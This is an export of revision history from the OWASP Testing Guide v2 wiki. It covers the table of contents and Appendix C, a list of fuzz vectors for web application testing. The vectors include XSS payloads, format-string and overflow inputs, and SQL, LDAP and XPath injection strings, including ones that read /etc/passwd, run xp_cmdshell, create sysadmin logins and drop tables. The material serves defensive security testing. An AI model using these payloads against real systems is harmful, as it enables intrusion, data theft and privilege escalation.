&lt;nowiki&gt;&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&gt;&quot;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'';!--&quot;&lt;XSS&gt;=&amp;{()}&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;javascript:alert('XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=javascript:alert('XSS')&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt; &lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=JaVaScRiPt:alert(&amp;amp;quot;XSS&lt;WBR&gt;&amp;amp;quot;)&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;&lt;WBR&gt;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;&lt;WBR&gt;#116;&amp;amp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;&lt;WBR&gt;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83&lt;WBR&gt;;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG<br /> SRC=&amp;#0000106&amp;#0000097&amp;&lt;WBR&gt;#0000118&amp;#0000097&amp;#0000115&amp;&lt;WBR&gt;#0000099&amp;#0000114&amp;#0000105&amp;&lt;WBR&gt;#0000112&amp;#0000116&amp;#0000058&amp;&lt;WBR&gt;#0000097&amp;#0000108&amp;#0000101&amp;&lt;WBR&gt;#0000114&amp;#0000116&amp;#0000040&amp;&lt;WBR&gt;#0000039&amp;#0000088&amp;#0000083&amp;&lt;WBR&gt;#0000083&amp;#0000039&amp;#0000041&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;&lt;WBR&gt;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;&lt;WBR&gt;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;&lt;WBR&gt;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x09;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x0A;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x0D;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Buffer Overflows and Format String Errors ===<br /> <br /> Brief overview of category here.<br /> <br /> ==== Buffer Overflows (BFO) ====<br /> <br /> Brief description here. <br /> <br /> Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.<br /> <br /> &lt;nowiki&gt;A x 5&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 17&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 33&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 65&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 129&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 257&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 513&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 1024&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 2049&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 4097&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 8193&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 12288&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> ==== Format String Errors (FSE) ====<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;%s%p%x%d&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;.1024d&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%.2049d&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%p%p%p%p&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%x%x%x%x&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%d%d%d%d&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%s%s%s%s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%99999999999s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%08x&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20d&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20n&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20x&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%s%s%s%s%s%s%s%s%s%s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%p%p%p%p%p%p%p%p%p%p&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%s x 129&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%x x 257&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> ==== Integer Overflows (INT) ====<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;-1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x100&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x1000&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x3fffffff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x7ffffffe&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x7fffffff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x80000000&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0xfffffffe&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0xffffffff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x10000&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x100000&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === SQL Injection ===<br /> <br /> Brief overview of category here.<br /> <br /> ==== Passive SQL Injection (SQP) ====<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;' OR 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;OR 1=1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR '1'='1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;; OR '1'='1'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+OR+%277659%27%3D%277659&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+--+&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot; or 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1=1 /*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;or 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 'a'='a&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot; or &quot;a&quot;=&quot;a&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;') or ('a'='a&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;Admin' OR '&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' having 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' having 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' group by userid having 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1 in (select @@version)--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union all select @@version--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'unusual' = 'unusual'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'something' = 'some'+'thing'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'text' = N'text'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'something' like 'some%'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 2 &gt; 1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'text' &gt; 't'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'whatever' in ('whatever')&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 2 BETWEEN 1 and 3&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or username like char(37);&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union select * from users where login = char(114,111,111,116);&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union select &lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;Password:*/=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;UNI/**/ON SEL/**/ECT&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'; EXEC ('SEL' + 'ECT US' + 'ER')&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'/**/OR/**/1/**/=/**/1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1/*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+OR+%277659%27%3D%277659&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+--+&amp;password=&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login &gt; @var select @var as var into temp end --&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' and 1 in (select var from temp)--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union select 1,load_file('/etc/passwd'),1,1,1;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' and 1=( if((load_file(char(110,46,101,120,116))&lt;&gt;char(39,39)),1,0));&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> ==== Active SQL Injection (SQI) ====<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;'; exec master..xp_cmdshell 'ping 10.10.1.2'--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;CRATE USER name IDENTIFIED BY 'pass123'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; &lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' ; drop table temp --&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;exec sp_addlogin 'name' , 'password'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;exec sp_addsrvrolemember 'name' , 'sysadmin'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;GRANT CONNECT TO name; GRANT RESOURCE TO name;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === LDAP Injection ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;*()|%26'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;admin*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;admin*)((|userPassword=*)&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;*)(uid=*))(|(uid=*&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === XPATH Injection ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;'+or+'1'='1&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> <br /> {{Category:OWASP Testing Project AoC}}</div> Subere https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_v2_Table_of_Contents&diff=13733 OWASP Testing Guide v2 Table of Contents 2006-11-27T10:55:47Z <p>Subere: /* Appendix C: Fuzz Vectors */</p> <hr /> <div>Updated 24th Nov, 12.00 GMT+1 <br /> Legend:&lt;br&gt;<br /> xx%: Progress status of the paragraph &lt;br&gt;<br /> Review: the paragraph need a review (Matteo Meucci)&lt;br&gt;<br /> TD: Paragraph To Be Assigned&lt;br&gt;<br /> <br /> [[http://www.owasp.org/index.php/OWASP_Autumn_of_Code_2006_-_Projects:_Testing_Guide OWASP Testing Guide AoC]]<br /> <br /> [[http://www.owasp.org/index.php/OWASP_Testing_Guide_v2_Review_Panel Review Panel]]<br /> <br /> <br /> ==[[Testing Guide Frontispiece AoC|Frontispiece]]==<br /> <br /> '''1.1 About the OWASP Testing Guide Project'''&lt;br&gt;<br /> 1.1.1 Copyright &lt;br&gt;<br /> 1.1.2 Editors (0%, Review)&lt;br&gt;<br /> 1.1.3 Authors and Reviewers (0%, Review)&lt;br&gt;<br /> 1.1.4 Revision History&lt;br&gt;<br /> 1.1.5 Trademarks&lt;br&gt;<br /> '''1.2 About The Open Web Application Security Project''' &lt;br&gt;<br /> 1.2.1 Overview &lt;br&gt;<br /> 1.2.2 Structure &lt;br&gt;<br /> 1.2.3 Licensing &lt;br&gt;<br /> 1.2.4 Participation and Membership &lt;br&gt;<br /> 1.2.5 Projects &lt;br&gt;<br /> 1.2.6 OWASP Privacy Policy &lt;br&gt;<br /> <br /> ==[[Testing Guide Introduction AoC|Introduction]]==<br /> '''2.1 The OWASP Testing Project''' &lt;br&gt;<br /> '''2.2 Principles of Testing''' &lt;br&gt;<br /> '''2.3 Testing Techniques Explained''' &lt;br&gt;<br /> <br /> ==[[The OWASP Testing Framework AoC|The OWASP Testing Framework]]==<br /> '''3.1. Overview''' &lt;br&gt;<br /> '''3.2. Phase 1 — Before Development Begins '''&lt;br&gt;<br /> '''3.3. Phase 2: During Definition and Design'''&lt;br&gt;<br /> '''3.4. Phase 3: During Development'''&lt;br&gt;<br /> '''3.5. Phase 4: During Deployment'''&lt;br&gt;<br /> '''3.6. Phase 5: Maintenance and Operations'''&lt;br&gt;<br /> '''3.7. A Typical SDLC Testing Workflow '''&lt;br&gt;<br /> <br /> ==[[Web Application Penetration Testing AoC |Web Application Penetration Testing ]]==<br /> '''4.1 Introduction and objectives''' (Matteo Meucci)&lt;br&gt;<br /> <br /> '''4.2 Information Gathering''' (Carlo Pelliccioni)&lt;br&gt;<br /> 4.2.1 Testing Web Application Fingerprint (Antonio Parata)&lt;br&gt;<br /> 4.2.2 Application Discovery (Mauro Bregolin)&lt;br&gt;<br /> 4.2.3 Spidering and googling (80%, Tom Brennan, Tom Ryan)&lt;br&gt;<br /> 4.2.4 Analysis of error codes (Carlo Pelliccioni)&lt;br&gt;<br /> 4.2.5 Infrastructure configuration management testing &lt;br&gt;<br /> 4.2.5.1 SSL/TLS Testing (Mauro Bregolin, Mark Curphey)&lt;br&gt;<br /> 4.2.5.2 DB Listener Testing (60%, Eoin Keary, Matteo Meucci)&lt;br&gt;<br /> 4.2.6 Application configuration management testing (90%)&lt;br&gt;<br /> 4.2.6.1 File extensions handling (Mauro Bregolin)&lt;br&gt;<br /> 4.2.6.2 Old, backup and unreferenced files (Mauro Bregolin, Javier Fernandez Sanguino, Dafydd Studdard)&lt;br&gt;<br /> <br /> '''4.3 Business logic testing''' (Madhura Halasgikar)&lt;br&gt;<br /> <br /> '''4.4 Authentication Testing''' (Meucci)&lt;br&gt;<br /> 4.4.1 Default or guessable (dictionary) user account &lt;br&gt;<br /> 4.4.2 Brute Force (Giorgio Fedon, Andrea Lombardini)&lt;br&gt;<br /> 4.4.3 Bypassing authentication schema (Giorgio Fedon, Andrea Lombardini)&lt;br&gt;<br /> 4.4.4 Directory traversal/file include (Luca Carettoni)&lt;br&gt;<br /> 4.4.5 Vulnerable remember password and pwd reset (Ralph M. Los,Alberto Revelli)&lt;br&gt;<br /> 4.4.6 Logout and Browser Cache Management Testing (Alberto Revelli)&lt;br&gt;<br /> <br /> '''4.5 Session Management Testing''' (Glyn Geoghegan, Meucci)&lt;br&gt;<br /> 4.5.1 Analysis of the Session Management Schema (Meucci)&lt;br&gt;<br /> 4.5.2 Cookie and Session token Manipulation (Alberto Revelli, Matteo Meucci) &lt;br&gt; <br /> 4.5.3 Exposed session variables (Meucci)&lt;br&gt;<br /> 4.5.4 Session Riding (XSRF) (Mauro Bregolin,Review)&lt;br&gt;<br /> 4.5.5 HTTP Exploit (0%, Arian J.Evans)&lt;br&gt;<br /> <br /> '''4.6 Data Validation Testing''' (Meucci) &lt;br&gt; <br /> 4.6.1 Cross site scripting (80%, Tom Brennan, Tom Ryan) &lt;br&gt;<br /> 4.6.1.1 HTTP Methods and XST (Alberto Revelli) &lt;br&gt;<br /> 4.6.2 SQL Injection (Antonio Parata) &lt;br&gt;<br /> 4.6.2.1 Stored procedure injection (40%,Gary Burns)&lt;br&gt;<br /> 4.6.2.2 Oracle testing (0%,TD) &lt;br&gt;<br /> 4.6.2.3 MySQL testing (Stefano Di Paola) &lt;br&gt;<br /> 4.6.2.4 SQL Server testing (Ariel Waissbein, Laura Nuñez, Alberto Revelli)&lt;br&gt;<br /> 4.6.3 LDAP Injection (Stefano Di Paola) &lt;br&gt; <br /> 4.6.4 ORM Injection (Mark Roxberry) &lt;br&gt;<br /> 4.6.5 XML Injection (Antonio Parata, Stefano Di Paola) &lt;br&gt;<br /> 4.6.6 SSI Injection (Claudio Merloni) &lt;br&gt;<br /> 4.6.7 XPath Injection (Antonio Parata, Alberto Revelli, Stefano Di Paola) &lt;br&gt;<br /> 4.6.8 IMAP/SMTP Injection (Vicente Aguilera) &lt;br&gt;<br /> 4.6.9 Code Injection (100%, Mark Roxberry) &lt;br&gt;<br /> 4.6.10 OS Commanding (70%, Gary Burns) &lt;br&gt;<br /> 4.6.11 Buffer overflow Testing &lt;br&gt;<br /> 4.6.11.1 Heap overflow &lt;br&gt;<br /> 4.6.11.2 Stack overflow &lt;br&gt;<br /> 4.6.11.3 Format string &lt;br&gt;<br /> 4.6.12 Incubated vulnerability testing (95%,Ariel Waissbein, Laura Nuñez) &lt;br&gt;<br /> <br /> '''4.7 Denial of Service Testing''' &lt;br&gt;<br /> 4.7.1 Locking Customer Accounts Review&lt;br&gt;<br /> 4.7.2 Buffer Overflows &lt;br&gt; <br /> 4.7.3 User Specified Object Allocation &lt;br&gt; <br /> 4.7.4 User Input as a Loop Counter &lt;br&gt;<br /> 4.7.5 Writing User Provided Data to Disk &lt;br&gt;<br /> 4.7.6 Failure to Release Resources &lt;br&gt;<br /> 4.7.7 Storing too Much Data in Session &lt;br&gt;<br /> <br /> '''4.8 Web Services Testing''' (Eoin Keary, Mark Roxberry)&lt;br&gt;<br /> 4.8.1 XML Structural Testing &lt;br&gt;<br /> 4.8.2 XML content-level Testing &lt;br&gt;<br /> 4.8.3 HTTP GET parameters/REST Testing &lt;br&gt;<br /> 4.8.4 Naughty SOAP attachments &lt;br&gt;<br /> 4.8.5 Replay Testing &lt;br&gt;<br /> <br /> '''4.9 AJAX Testing''' (70%, Dan Cornell, Giorgio Fedon, Stefano Di Paola)&lt;br&gt;<br /> 4.9.1 Vulnerabilities (90%, Anush Shetty) &lt;br&gt;<br /> 4.9.2 How to test (60%)&lt;br&gt;<br /> <br /> ==[[Writing Reports: value the real risk AoC |Writing Reports: value the real risk ]]==<br /> '''5.1 How to value the real risk''' (90%, Daniel Cuthbert, Matteo Meucci, Sebastien Deleersnyder, Marco Morana)&lt;br&gt;<br /> '''5.2 How to write the report of the testing''' (20%, Daniel Cuthbert, Tom Brennan, Tom Ryan) TD&lt;br&gt;<br /> <br /> ==[[Appendix A: Testing Tools |Appendix A: Testing Tools ]]==<br /> (90%)&lt;br&gt;<br /> * Black Box Testing Tools<br /> * Source Code Analyzers<br /> * Other Tools<br /> <br /> ==[[OWASP Testing Guide Appendix B: Suggested Reading | Appendix B: Suggested Reading]]==<br /> (70%)&lt;br&gt;<br /> * Whitepapers&lt;br&gt;<br /> * Books&lt;br&gt;<br /> * Articles&lt;br&gt;<br /> * Useful Websites&lt;br&gt;<br /> <br /> ==[[OWASP Testing Guide Appendix C: Fuzz Vectors | Appendix C: Fuzz Vectors]]==<br /> (80%)<br /> <br /> * Fuzz Categories<br /> ** Recursive fuzzing<br /> ** Replasive fuzzing<br /> * Cross Site Scripting (XSS)<br /> * Buffer Overflows (BFO)<br /> * Format String Errors (FSE)<br /> * Integer Overflows (INT)<br /> * Passive SQL Injection (SQP)<br /> * Active SQL Injection (SQI)<br /> * LDAP Injection (LDP)<br /> * XPATH Injection (XPH)<br /> <br /> &lt;br&gt;<br /> <br /> {{Category:OWASP Testing Project AoC}}</div> Subere https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&diff=13556 OWASP Testing Guide Appendix C: Fuzz Vectors 2006-11-22T18:02:44Z <p>Subere: </p> <hr /> <div>[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&lt;br&gt;<br /> {{Template:OWASP Testing Guide v2}}<br /> <br /> <br /> The following are fuzzing vectors which can be used with webscarab, jbrofuzz or another fuzzer.<br /> Fuzzing is the &quot;kitchen sink&quot; approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing.<br /> This is the simple part of the discovery phase.<br /> Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required.<br /> <br /> === Fuzz Categories ===<br /> <br /> In the case of stateless network protocol fuzzing (like HTTP(S)) two broad categories exist:<br /> <br /> * Recursive fuzzing<br /> * Replasive fuzzing<br /> <br /> We examine and define each category in the sub-sections that follow. <br /> <br /> ==== Recursive fuzzing ====<br /> <br /> Recursive fuzzing can be defined as the process of fuzzing a part of a request by iterating through all the possible combinations of a set alphabet. Consider the case of:<br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.owasp.org/8302fa3b&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> Selecting &quot;8302fa3b&quot; as a part of the request to be fuzzed against the set hexadecimal alphabet i.e. {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form:<br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.owasp.org/00000000&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;...&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.owasp.org/11000fff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;...&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.owasp.org/ffffffff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;/pre&gt;<br /> <br /> ==== Replasive fuzzing ====<br /> <br /> Replasive fuzzing can be defined as the process of fuzzing part of a request by means of replacing it with a set value. This value is known as a fuzz vector. In the case of:<br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.owasp.org/8302fa3b&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> Testing against Cross Site Scripting (XSS) by sending the following fuzz vectors: <br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.owasp.org/&gt;&quot;&gt;&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;&amp;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;http://www.owasp.org/'';!--&quot;&lt;XSS&gt;=&amp;{()}&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;/pre&gt;<br /> <br /> This is a form of replasive fuzzing. In this category, the total number of requests is dependant on the number of fuzz vectors specified. <br /> <br /> The remainder of this appendix presents a number of fuzz vector categories.<br /> <br /> === Cross Site Scripting (XSS) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;&gt;&quot;&gt;&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;&amp;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot;&gt;&lt;STYLE&gt;@import&quot;javascript:alert('XSS')&quot;;&lt;/STYLE&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&gt;&quot;'&gt;&lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&gt;%22%27&gt;&lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&gt;&quot;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'';!--&quot;&lt;XSS&gt;=&amp;{()}&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;javascript:alert('XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=javascript:alert('XSS')&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt; &lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=JaVaScRiPt:alert(&amp;amp;quot;XSS&lt;WBR&gt;&amp;amp;quot;)&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;&lt;WBR&gt;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;&lt;WBR&gt;#116;&amp;amp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;&lt;WBR&gt;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83&lt;WBR&gt;;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> 